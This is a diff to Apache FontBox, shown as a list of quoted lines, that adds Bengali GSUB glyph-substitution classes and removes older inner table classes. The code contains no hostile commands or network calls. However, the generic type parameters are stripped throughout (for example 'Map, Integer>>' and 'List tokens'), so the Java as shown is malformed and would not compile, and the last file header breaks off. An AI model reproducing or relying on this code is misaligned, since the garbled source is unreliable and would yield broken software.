- "- static class LangSysTable", - "- {", - "- int requiredFeatureIndex;", - "- int[] featureIndices;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"LangSysTable[requiredFeatureIndex=%d]\", requiredFeatureIndex);", - "- }", - "- }", - "-", - "- static class FeatureRecord", - "- {", - "- String featureTag;", - "- FeatureTable featureTable;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"FeatureRecord[featureTag=%s]\", featureTag);", - "- }", - "- }", - "-", - "- static class FeatureTable", - "- {", - "- int[] lookupListIndices;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"FeatureTable[lookupListIndiciesCount=%d]\",", - "- lookupListIndices.length);", - "- }", - "- }", - "-", - "- static class LookupTable", - "- {", - "- int lookupType;", - "- int lookupFlag;", - "- int markFilteringSet;", - "- LookupSubTable[] subTables;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"LookupTable[lookupType=%d,lookupFlag=%d,markFilteringSet=%d]\",", - "- lookupType, lookupFlag, markFilteringSet);", - "- }", - "- }", - "-", - "- static abstract class LookupSubTable", - "- {", - "- int substFormat;", - "- CoverageTable coverageTable;", - "-", - "- abstract int doSubstitution(int gid, int coverageIndex);", - "- }", - "-", - "- static class LookupTypeSingleSubstFormat1 extends LookupSubTable", - "- {", - "- short deltaGlyphID;", - "-", - "- @Override", - "- int doSubstitution(int gid, int coverageIndex)", - "- {", - "- return coverageIndex < 0 ? gid : gid + deltaGlyphID;", - "- }", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"LookupTypeSingleSubstFormat1[substFormat=%d,deltaGlyphID=%d]\",", - "- substFormat, deltaGlyphID);", - "- }", - "- }", - "-", - "- static class LookupTypeSingleSubstFormat2 extends LookupSubTable", - "- {", - "- int[] substituteGlyphIDs;", - "-", - "- @Override", - "- int doSubstitution(int gid, int coverageIndex)", - "- {", - "- return coverageIndex < 0 ? gid : substituteGlyphIDs[coverageIndex];", - "- }", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(", - "- \"LookupTypeSingleSubstFormat2[substFormat=%d,substituteGlyphIDs=%s]\",", - "- substFormat, Arrays.toString(substituteGlyphIDs));", - "- }", - "- }", - "-", - "- static abstract class CoverageTable", - "- {", - "- int coverageFormat;", - "-", - "- abstract int getCoverageIndex(int gid);", - "- }", - "-", - "- static class CoverageTableFormat1 extends CoverageTable", - "- {", - "- int[] glyphArray;", - "-", - "- @Override", - "- int getCoverageIndex(int gid)", - "- {", - "- return Arrays.binarySearch(glyphArray, gid);", - "- }", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"CoverageTableFormat1[coverageFormat=%d,glyphArray=%s]\",", - "- coverageFormat, Arrays.toString(glyphArray));", - "- }", - "- }", - "-", - "- static class CoverageTableFormat2 extends CoverageTable", - "- {", - "- RangeRecord[] rangeRecords;", - "-", - "- @Override", - "- int getCoverageIndex(int gid)", - "- {", - "- for (RangeRecord rangeRecord : rangeRecords)", - "- {", - "- if (rangeRecord.startGlyphID <= gid && gid <= rangeRecord.endGlyphID)", - "- {", - "- return rangeRecord.startCoverageIndex + gid - rangeRecord.startGlyphID;", - "- }", - "- }", - "- return -1;", - "- }", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"CoverageTableFormat2[coverageFormat=%d]\", coverageFormat);", - "- }", - "- }", - "-", - "- static class RangeRecord", - "- {", - "- int startGlyphID;", - "- int endGlyphID;", - "- int startCoverageIndex;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"RangeRecord[startGlyphID=%d,endGlyphID=%d,startCoverageIndex=%d]\",", - "- startGlyphID, endGlyphID, startCoverageIndex);", - "- }", - "- }", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "index 7731b3342..1e7b4880a 100755", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "@@ -1130,2 +1130,8 @@ public final class TTFSubsetter", - " }", - "+", - "+ public void addGlyphIds(Set allGlyphIds)", - "+ {", - "+ glyphIds.addAll(allGlyphIds);", - "+ }", - "+", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "index 3867ede86..8edcc6188 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "@@ -567,3 +567,3 @@ public class TrueTypeFont implements FontBoxFont, Closeable", - " {", - "- return new SubstitutingCmapLookup(cmap, (GlyphSubstitutionTable) table,", - "+ return new SubstitutingCmapLookup(cmap, table,", - " Collections.unmodifiableList(enabledGsubFeatures));", - "@@ -656,2 +656,13 @@ public class TrueTypeFont implements FontBoxFont, Closeable", - "+ public Map, Integer>> getGlyphSubstitutionMap() throws IOException", - "+ {", - "+ GlyphSubstitutionTable table = getGsub();", - "+ if (table == null)", - "+ {", - "+ return Collections.emptyMap();", - "+ }", - "+", - "+ return table.getRawGSubData();", - "+ }", - "+", - " /**", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", - "new file mode 100644", - "index 000000000..e24828d1b", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", - "@@ -0,0 +1,102 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import java.util.ArrayList;", - "+import java.util.List;", - "+import java.util.Set;", - "+import java.util.regex.Matcher;", - "+import java.util.regex.Pattern;", - "+", - "+/**", - "+ * Takes in the given text having compound-glyphs to substitute, and splits it into chunks consisting of parts that", - "+ * should be substituted and the ones that can be processed normally.", - "+ * ", - "+ * @author Palash Ray", - "+ * ", - "+ */", - "+public class CompoundCharacterTokenizer", - "+{", - "+", - "+ private final Pattern regexExpression;", - "+", - "+ public CompoundCharacterTokenizer(Set compoundWords)", - "+ {", - "+ regexExpression = Pattern.compile(getRegexFromTokens(compoundWords));", - "+ }", - "+", - "+ public CompoundCharacterTokenizer(String singleRegex)", - "+ {", - "+ regexExpression = Pattern.compile(singleRegex);", - "+ }", - "+", - "+ public List tokenize(String text)", - "+ {", - "+ List tokens = new ArrayList();", - "+", - "+ Matcher regexMatcher = regexExpression.matcher(text);", - "+", - "+ int lastIndexOfPrevMatch = 0;", - "+", - "+ while (regexMatcher.find())", - "+ {", - "+", - "+ int beginIndexOfNextMatch = regexMatcher.start();", - "+", - "+ String prevToken = text.substring(lastIndexOfPrevMatch, beginIndexOfNextMatch);", - "+", - "+ if (prevToken.length() > 0)", - "+ {", - "+ tokens.add(prevToken);", - "+ }", - "+", - "+ String currentMatch = regexMatcher.group();", - "+", - "+ tokens.add(currentMatch);", - "+", - "+ lastIndexOfPrevMatch = regexMatcher.end();", - "+", - "+ }", - "+", - "+ String tail = text.substring(lastIndexOfPrevMatch, text.length());", - "+", - "+ if (tail.length() > 0)", - "+ {", - "+ tokens.add(tail);", - "+ }", - "+", - "+ return tokens;", - "+ }", - "+", - "+ private String getRegexFromTokens(Set compoundWords)", - "+ {", - "+ StringBuilder sb = new StringBuilder();", - "+", - "+ for (String compoundWord : compoundWords)", - "+ {", - "+ sb.append(\"(\");", - "+ sb.append(compoundWord);", - "+ sb.append(\")|\");", - "+ }", - "+", - "+ sb.setLength(sb.length() - 1);", - "+", - "+ return sb.toString();", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java", - "new file mode 100644", - "index 000000000..fcb91afa2", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java", - "@@ -0,0 +1,33 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import java.util.List;", - "+", - "+/**", - "+ * This class splits an array of GlyphIds with a prospective match.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public interface GlyphArraySplitter", - "+{", - "+", - "+ List> split(List glyphIds);", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java", - "new file mode 100644", - "index 000000000..8cf324fb0", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java", - "@@ -0,0 +1,95 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import java.util.ArrayList;", - "+import java.util.HashSet;", - "+import java.util.List;", - "+import java.util.Set;", - "+", - "+/**", - "+ * This is an in-efficient implementation based on regex, which helps split the array.", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class GlyphArraySplitterRegexImpl implements GlyphArraySplitter", - "+{", - "+ private static final String GLYPH_ID_SEPARATOR = \"_\";", - "+", - "+ private final CompoundCharacterTokenizer compoundCharacterTokenizer;", - "+", - "+ public GlyphArraySplitterRegexImpl(Set> matchers)", - "+ {", - "+ compoundCharacterTokenizer = new CompoundCharacterTokenizer(getMatchersAsStrings(matchers));", - "+ }", - "+", - "+ @Override", - "+ public List> split(List glyphIds)", - "+ {", - "+ String originalGlyphsAsText = convertGlyphIdsToString(glyphIds);", - "+ List tokens = compoundCharacterTokenizer.tokenize(originalGlyphsAsText);", - "+", - "+ List> modifiedGlyphs = new ArrayList<>();", - "+", - "+ for (String token : tokens)", - "+ {", - "+ modifiedGlyphs.add(convertGlyphIdsToList(token));", - "+ }", - "+", - "+ return modifiedGlyphs;", - "+ }", - "+", - "+ private Set getMatchersAsStrings(Set> matchers)", - "+ {", - "+ Set stringMatchers = new HashSet<>(matchers.size());", - "+ for (List glyphIds : matchers)", - "+ {", - "+ stringMatchers.add(convertGlyphIdsToString(glyphIds));", - "+ }", - "+ return stringMatchers;", - "+ }", - "+", - "+ private String convertGlyphIdsToString(List glyphIds)", - "+ {", - "+ StringBuilder sb = new StringBuilder(20);", - "+ sb.append(GLYPH_ID_SEPARATOR);", - "+ for (Integer glyphId : glyphIds)", - "+ {", - "+ sb.append(glyphId).append(GLYPH_ID_SEPARATOR);", - "+ }", - "+ return sb.toString();", - "+ }", - "+", - "+ private List convertGlyphIdsToList(String glyphIdsAsString)", - "+ {", - "+ List gsubProcessedGlyphsIds = new ArrayList<>();", - "+", - "+ for (String glyphId : glyphIdsAsString.split(GLYPH_ID_SEPARATOR))", - "+ {", - "+ if (glyphId.trim().length() == 0)", - "+ {", - "+ continue;", - "+ }", - "+ gsubProcessedGlyphsIds.add(Integer.valueOf(glyphId));", - "+ }", - "+", - "+ return gsubProcessedGlyphsIds;", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "new file mode 100644", - "index 000000000..7fb2c0eea", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "@@ -0,0 +1,235 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import java.util.ArrayList;", - "+import java.util.Arrays;", - "+import java.util.Collections;", - "+import java.util.LinkedHashMap;", - "+import java.util.List;", - "+import java.util.Map;", - "+", - "+import org.apache.commons.logging.Log;", - "+import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.table.common.CoverageTable;", - "+import org.apache.fontbox.ttf.table.common.FeatureListTable;", - "+import org.apache.fontbox.ttf.table.common.FeatureRecord;", - "+import org.apache.fontbox.ttf.table.common.LangSysTable;", - "+import org.apache.fontbox.ttf.table.common.LookupListTable;", - "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", - "+import org.apache.fontbox.ttf.table.common.LookupTable;", - "+import org.apache.fontbox.ttf.table.common.ScriptTable;", - "+import org.apache.fontbox.ttf.table.gsub.LigatureSetTable;", - "+import org.apache.fontbox.ttf.table.gsub.LigatureTable;", - "+import org.apache.fontbox.ttf.table.gsub.LookupTypeLigatureSubstitutionSubstFormat1;", - "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat1;", - "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat2;", - "+", - "+/**", - "+ * This class has utility methods to extract meaningful data from the highly obfuscated GSUB Tables. This data is then", - "+ * used to determine which combination of Glyphs or words have to be replaced.", - "+ * ", - "+ * @author Palash Ray", - "+ * ", - "+ */", - "+public class GlyphSubstitutionDataExtractor", - "+{", - "+", - "+ private static final Log LOG = LogFactory.getLog(GlyphSubstitutionDataExtractor.class);", - "+", - "+ private static final String[] SUPPORTED_LANGUAGES = { \"bng2\", \"beng\" };", - "+", - "+ public Map, Integer>> getGsubData(Map scriptList,", - "+ FeatureListTable featureListTable, LookupListTable lookupListTable)", - "+ {", - "+", - "+ ScriptTable scriptTable = getSupportedLanguage(scriptList);", - "+", - "+ if (scriptTable == null)", - "+ {", - "+ return Collections.emptyMap();", - "+ }", - "+", - "+ Map, Integer>> gsubData = new LinkedHashMap<>();", - "+ // the starting point is really the scriptTags", - "+ if (scriptTable.getDefaultLangSysTable() != null)", - "+ {", - "+ populateGsubData(gsubData, scriptTable.getDefaultLangSysTable(), featureListTable,", - "+ lookupListTable);", - "+ }", - "+ for (LangSysTable langSysTable : scriptTable.getLangSysTables().values())", - "+ {", - "+ populateGsubData(gsubData, langSysTable, featureListTable, lookupListTable);", - "+ }", - "+ return Collections.unmodifiableMap(gsubData);", - "+ }", - "+", - "+ private ScriptTable getSupportedLanguage(Map scriptList)", - "+ {", - "+ for (String supportedLanguage : SUPPORTED_LANGUAGES)", - "+ {", - "+ if (scriptList.containsKey(supportedLanguage))", - "+ {", - "+ return scriptList.get(supportedLanguage);", - "+ }", - "+ }", - "+ return null;", - "+ }", - "+", - "+ private void populateGsubData(Map, Integer>> gsubData,", - "+ LangSysTable langSysTable, FeatureListTable featureListTable,", - "+ LookupListTable lookupListTable)", - "+ {", - "+ for (int featureIndex : langSysTable.getFeatureIndices())", - "+ {", - "+ FeatureRecord featureRecord = featureListTable.getFeatureRecords()[featureIndex];", - "+ populateGsubData(gsubData, featureRecord, lookupListTable);", - "+ }", - "+ }", - "+", - "+ private void populateGsubData(Map, Integer>> gsubData,", - "+ FeatureRecord featureRecord, LookupListTable lookupListTable)", - "+ {", - "+", - "+ LOG.debug(\"*********** extracting GSUB data for the feature: \"", - "+ + featureRecord.getFeatureTag());", - "+", - "+ Map, Integer> glyphSubstitutionMap = new LinkedHashMap<>();", - "+ for (int lookupIndex : featureRecord.getFeatureTable().getLookupListIndices())", - "+ {", - "+ LookupTable lookupTable = lookupListTable.getLookups()[lookupIndex];", - "+ extractData(glyphSubstitutionMap, lookupTable);", - "+ }", - "+ gsubData.put(featureRecord.getFeatureTag(),", - "+ Collections.unmodifiableMap(glyphSubstitutionMap));", - "+ }", - "+", - "+ private void extractData(Map, Integer> glyphSubstitutionMap,", - "+ LookupTable lookupTable)", - "+ {", - "+", - "+ for (LookupSubTable lookupSubTable : lookupTable.getSubTables())", - "+ {", - "+ if (lookupSubTable instanceof LookupTypeLigatureSubstitutionSubstFormat1)", - "+ {", - "+ extractDataFromLigatureSubstitutionSubstFormat1Table(glyphSubstitutionMap,", - "+ (LookupTypeLigatureSubstitutionSubstFormat1) lookupSubTable);", - "+ }", - "+ else if (lookupSubTable instanceof LookupTypeSingleSubstFormat1)", - "+ {", - "+ extractDataFromSingleSubstTableFormat1Table(glyphSubstitutionMap,", - "+ (LookupTypeSingleSubstFormat1) lookupSubTable);", - "+ }", - "+ else if (lookupSubTable instanceof LookupTypeSingleSubstFormat2)", - "+ {", - "+ extractDataFromSingleSubstTableFormat2Table(glyphSubstitutionMap,", - "+ (LookupTypeSingleSubstFormat2) lookupSubTable);", - "+ }", - "+ else", - "+ {", - "+ LOG.warn(\"The type \" + lookupSubTable + \" is not yet supported, will be ignored\");", - "+ }", - "+ }", - "+", - "+ }", - "+", - "+ private void extractDataFromSingleSubstTableFormat1Table(", - "+ Map, Integer> glyphSubstitutionMap,", - "+ LookupTypeSingleSubstFormat1 singleSubstTableFormat1)", - "+ {", - "+ CoverageTable coverageTable = singleSubstTableFormat1.getCoverageTable();", - "+ for (int i = 0; i < coverageTable.getSize(); i++)", - "+ {", - "+ int coverageGlyphId = coverageTable.getGlyphId(i);", - "+ int substituteGlyphId = coverageGlyphId + singleSubstTableFormat1.getDeltaGlyphID();", - "+ putNewSubstitutionEntry(glyphSubstitutionMap, substituteGlyphId,", - "+ Arrays.asList(coverageGlyphId));", - "+ }", - "+ }", - "+", - "+ private void extractDataFromSingleSubstTableFormat2Table(", - "+ Map, Integer> glyphSubstitutionMap,", - "+ LookupTypeSingleSubstFormat2 singleSubstTableFormat2)", - "+ {", - "+", - "+ CoverageTable coverageTable = singleSubstTableFormat2.getCoverageTable();", - "+", - "+ if (coverageTable.getSize() != singleSubstTableFormat2.getSubstituteGlyphIDs().length)", - "+ {", - "+ throw new IllegalArgumentException(", - "+ \"The no. coverage table entries should be the same as the size of the substituteGlyphIDs\");", - "+ }", - "+", - "+ for (int i = 0; i < coverageTable.getSize(); i++)", - "+ {", - "+ int coverageGlyphId = coverageTable.getGlyphId(i);", - "+ int substituteGlyphId = coverageGlyphId", - "+ + singleSubstTableFormat2.getSubstituteGlyphIDs()[i];", - "+ putNewSubstitutionEntry(glyphSubstitutionMap, substituteGlyphId,", - "+ Arrays.asList(coverageGlyphId));", - "+ }", - "+ }", - "+", - "+ private void extractDataFromLigatureSubstitutionSubstFormat1Table(", - "+ Map, Integer> glyphSubstitutionMap,", - "+ LookupTypeLigatureSubstitutionSubstFormat1 ligatureSubstitutionTable)", - "+ {", - "+", - "+ for (LigatureSetTable ligatureSetTable : ligatureSubstitutionTable.getLigatureSetTables())", - "+ {", - "+ for (LigatureTable ligatureTable : ligatureSetTable.getLigatureTables())", - "+ {", - "+ extractDataFromLigatureTable(glyphSubstitutionMap, ligatureTable);", - "+ }", - "+", - "+ }", - "+", - "+ }", - "+", - "+ private void extractDataFromLigatureTable(Map, Integer> glyphSubstitutionMap,", - "+ LigatureTable ligatureTable)", - "+ {", - "+", - "+ List glyphsToBeSubstituted = new ArrayList<>();", - "+", - "+ for (int componentGlyphID : ligatureTable.getComponentGlyphIDs())", - "+ {", - "+ glyphsToBeSubstituted.add(componentGlyphID);", - "+ }", - "+", - "+ LOG.debug(\"glyphsToBeSubstituted: \" + glyphsToBeSubstituted);", - "+", - "+ putNewSubstitutionEntry(glyphSubstitutionMap, ligatureTable.getLigatureGlyph(),", - "+ glyphsToBeSubstituted);", - "+", - "+ }", - "+", - "+ private void putNewSubstitutionEntry(Map, Integer> glyphSubstitutionMap,", - "+ int newGlyph, List glyphsToBeSubstituted)", - "+ {", - "+ Integer oldValue = glyphSubstitutionMap.put(glyphsToBeSubstituted, newGlyph);", - "+", - "+ if (oldValue != null)", - "+ {", - "+ String message = \"For the newGlyph: \" + newGlyph + \", newValue: \"", - "+ + glyphsToBeSubstituted + \" is trying to override the oldValue: \" + oldValue;", - "+ LOG.warn(message);", - "+ }", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "new file mode 100644", - "index 000000000..8e3287ed7", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "@@ -0,0 +1,35 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import java.util.List;", - "+", - "+/**", - "+ * This class is responsible for replacing GlyphIDs with new ones according to the GSUB tables. Each language should", - "+ * have an implementation of this.", - "+ * ", - "+ * @author Palash Ray", - "+ * ", - "+ */", - "+public interface GsubWorker", - "+{", - "+ List substituteGlyphs(List originalGlyphIds);", - "+", - "+ List repositionGlyphs(List originalGlyphIds);", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "new file mode 100644", - "index 000000000..d44ba3a50", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "@@ -0,0 +1,148 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.gsub;", - "+", - "+import java.util.ArrayList;", - "+import java.util.Arrays;", - "+import java.util.Collections;", - "+import java.util.List;", - "+import java.util.Map;", - "+", - "+import org.apache.commons.logging.Log;", - "+import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.CmapLookup;", - "+", - "+/**", - "+ * ", - "+ * Bengali-specific implementation of GSUB system", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class GsubWorkerForBengali implements GsubWorker", - "+{", - "+", - "+ private static final Log LOG = LogFactory.getLog(GsubWorkerForBengali.class);", - "+", - "+ /**", - "+ * This sequence is very important. This has been taken from https://docs.microsoft.com/en-us/typography/script-development/bengali", - "+ */", - "+ private static final List FEATURES_IN_ORDER = Arrays.asList(\"locl\", \"nukt\", \"akhn\",", - "+ \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", \"init\", \"pres\", \"abvs\", \"blws\", \"psts\",", - "+ \"haln\", \"calt\");", - "+", - "+ private static final char[] BEFORE_HALF_CHARS = new char[] { '\\u09BF', '\\u09C7', '\\u09C8' };", - "+", - "+ private final Map, Integer>> glyphSubstitutionMap;", - "+", - "+ private final List beforeHalfGlyphIds;", - "+", - "+ public GsubWorkerForBengali(CmapLookup cmapLookup,", - "+ Map, Integer>> glyphSubstitutionMap)", - "+ {", - "+ this.glyphSubstitutionMap = glyphSubstitutionMap;", - "+ beforeHalfGlyphIds = getBeforeHalfGlyphIds(cmapLookup);", - "+ }", - "+", - "+ @Override", - "+ public List substituteGlyphs(List originalGlyphIds)", - "+ {", - "+ List intermediateGlyphsFromGsub = originalGlyphIds;", - "+", - "+ for (String feature : FEATURES_IN_ORDER)", - "+ {", - "+ if (!glyphSubstitutionMap.containsKey(feature))", - "+ {", - "+ LOG.debug(\"the feature \" + feature + \" was not found\");", - "+ continue;", - "+ }", - "+", - "+ LOG.debug(\"applying the feature \" + feature);", - "+", - "+ Map, Integer> featureMap = glyphSubstitutionMap.get(feature);", - "+", - "+ intermediateGlyphsFromGsub = applyGsubFeature(featureMap, intermediateGlyphsFromGsub);", - "+ }", - "+", - "+ return intermediateGlyphsFromGsub;", - "+ }", - "+", - "+ @Override", - "+ public List repositionGlyphs(List originalGlyphIds)", - "+ {", - "+ List repositionedGlyphIds = new ArrayList<>(originalGlyphIds);", - "+", - "+ for (int index = 1; index < originalGlyphIds.size(); index++)", - "+ {", - "+ int glyphId = originalGlyphIds.get(index);", - "+ if (beforeHalfGlyphIds.contains(glyphId))", - "+ {", - "+ int previousGlyphId = originalGlyphIds.get(index - 1);", - "+ repositionedGlyphIds.set(index, previousGlyphId);", - "+ repositionedGlyphIds.set(index - 1, glyphId);", - "+ }", - "+ }", - "+ return repositionedGlyphIds;", - "+ }", - "+", - "+ private List applyGsubFeature(Map, Integer> featureMap,", - "+ List originalGlyphs)", - "+ {", - "+", - "+ GlyphArraySplitter glyphArraySplitter = new GlyphArraySplitterRegexImpl(", - "+ featureMap.keySet());", - "+", - "+ List> tokens = glyphArraySplitter.split(originalGlyphs);", - "+", - "+ List gsubProcessedGlyphs = new ArrayList<>();", - "+", - "+ for (List chunk : tokens)", - "+ {", - "+ if (featureMap.containsKey(chunk))", - "+ {", - "+ // gsub system kicks in, you get the glyphId directly", - "+ int glyphId = featureMap.get(chunk);", - "+ gsubProcessedGlyphs.add(glyphId);", - "+ }", - "+ else", - "+ {", - "+ gsubProcessedGlyphs.addAll(chunk);", - "+ }", - "+ }", - "+", - "+ LOG.debug(\"originalGlyphs: \" + originalGlyphs + \", gsubProcessedGlyphs: \"", - "+ + gsubProcessedGlyphs);", - "+", - "+ return gsubProcessedGlyphs;", - "+ }", - "+", - "+ private static List getBeforeHalfGlyphIds(CmapLookup cmapLookup)", - "+ {", - "+ List beforeHalfGlyphIds = new ArrayList<>();", - "+", - "+ for (char beforeHalfChar : BEFORE_HALF_CHARS)", - "+ {", - "+ beforeHalfGlyphIds.add(cmapLookup.getGlyphId(beforeHalfChar));", - "+ }", - "+", - "+ return Collections.unmodifiableList(beforeHalfGlyphIds);", - "+", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html", - "new file mode 100644", - "index 000000000..a3349107e", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html", - "@@ -0,0 +1,25 @@", - "+", - "+", - "+", - "+", - "+", - "+", - "+", - "+This package contains utility classes which extract meanigful data from the highly obfuscated GSUB table structures.", - "+", - "+", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java 